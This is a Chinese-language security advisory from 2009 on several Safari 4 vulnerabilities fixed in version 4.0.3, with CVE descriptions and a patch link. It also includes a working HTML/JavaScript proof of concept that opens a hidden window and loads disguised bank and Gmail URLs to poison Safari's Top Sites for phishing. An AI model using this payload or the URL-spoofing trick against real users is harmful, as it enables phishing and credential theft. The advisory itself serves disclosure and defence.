安全研究
安全漏洞
Safari 4.0.3版本修复多个安全漏洞
发布日期:2009-08-11
更新日期:2009-08-13
受影响系统:
Apple Safari 4.x不受影响系统:
Apple Safari 4.0.3描述:
BUGTRAQ ID: 36023,36022,36024,36026,36025
CVE(CAN) ID: CVE-2009-2195,CVE-2009-2196,CVE-2009-2200,CVE-2009-2199,CVE-2009-2188
Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。
远程攻击者可以利用Safari浏览器中的多个内存破坏和设计错误导致拒绝服务、执行任意代码或执行网络钓鱼攻击。
CVE-2009-2196
Safari 4引入了Top Sites功能,允许方便的查看用户最喜欢的站点。恶意网站可以通过自动化的操作向Top Sites视图中提供任意站点,这有助于网络钓鱼攻击。
CVE-2009-2195
WebKit解析浮点数时存在缓冲区溢出,访问了恶意网站可能导致应用程序意外终止或执行任意代码。
CVE-2009-2200
WebKit允许embed元素的pluginspage属性引用文件URL,在引用未知的插件类型时点击对话框中的Go会重新定向到pluginspage属性中所列出的URL。这可能允许远程攻击者在Safari中启动文件URL,导致泄漏敏感信息。
CVE-2009-2199
Safari中内嵌的IDN支持和Unicode字体可能用于创建包含有相似字符的URL,恶意站点可以将用户定向到看起来为合法域的欺骗站点。
CVE-2009-2188
在处理EXIF元数据时存在缓冲区溢出,查看恶意的图形可能导致应用程序意外终止或执行任意代码。
<*来源:Alexios Fakos
Chris Weber
链接:http://secunia.com/advisories/36269/
http://securethoughts.com/2009/08/hijacking-safari-4-top-sites-with-phish-bombs/
http://support.apple.com/kb/HT3733
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head>
<title>Hijacking Safari 4 Top Sites with Phish Bombs</title>
</head>
<body>
<div align="center"><h1>Hijacking Safari 4 Top Sites with Phish Bombs</h1>
<h2>By Inferno</h2>
<a href="javascript: {
w1=window.open('http://www.bankofamerica.com@174.120.41.176/~inferno/b/index.htm','window1','status=0,toolbar=0,location=0,menubar=0,directories=0,scrollbars=0,height=0,width=0,left=3000,top=3000');
w1.blur();
for(i=1;i<29;i++)
{
if(i % 2==0) {
setTimeout('w1.location.href=\'http://www.bankofamerica.com@174.120.41.176/~inferno/b/index.htm\'',i*2000);
}
else {
setTimeout('w1.location.href=\'www.gmail.com@securethoughts.com/b/index.htm\'',i*2000);" target="_blank">http://www.gmail.com@securethoughts.com/b/index.htm\'',i*2000);
}
}
setTimeout('w1.close()',i*2000);
}">Click here to run the PoC</a>
</div>
</body>
</html>
建议:
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.apple.com/safari/download/
浏览次数:2458
严重程度:0(网友投票)
绿盟科技给您安全的保障